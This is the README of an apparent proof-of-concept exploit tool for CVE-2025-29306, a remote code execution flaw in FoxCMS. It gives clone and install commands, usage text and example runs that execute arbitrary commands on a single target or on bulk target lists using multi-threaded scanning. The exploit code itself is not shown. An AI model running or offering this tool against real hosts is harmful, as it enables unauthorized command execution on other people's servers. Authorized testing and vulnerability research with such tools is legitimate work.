A Python exploit for CVE-2025-29306, a remote code execution vulnerability in FoxCMS. This tool allows testing single targets or scanning multiple hosts in bulk.
- Single target or bulk scanning capability
- Multi-threaded for fast scanning
- Detailed output with command execution results
- Automatic results saving to file
- Real-time progress reporting
- Clean summary table of vulnerable hosts
```
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
```

- Python 3.6+
- Required packages:
  - requests
  - beautifulsoup4
  - argparse
Install requirements with:
```
pip install requests beautifulsoup4
```

```
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)

CVE-2025-29306 Exploit Checker

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Command to execute on vulnerable hosts
  -t TARGET, --target TARGET
                        Single target in the format ip:port
  -f TARGETS_FILE, --targets-file TARGETS_FILE
                        File containing multiple targets, one per line, in the format ip:port
```
- Test a single target:

```
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
```

- Scan multiple targets from a file:

```
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
```

- Save output to file (automatically done):

```
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
```

The targets file should contain one target per line in the format:

```
ip:port
```

Example:

```
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
```

The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all vulnerable hosts
- Automatic saving of full results to `foxcms_rce_results.txt`

This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.
MIT License - See LICENSE file for details
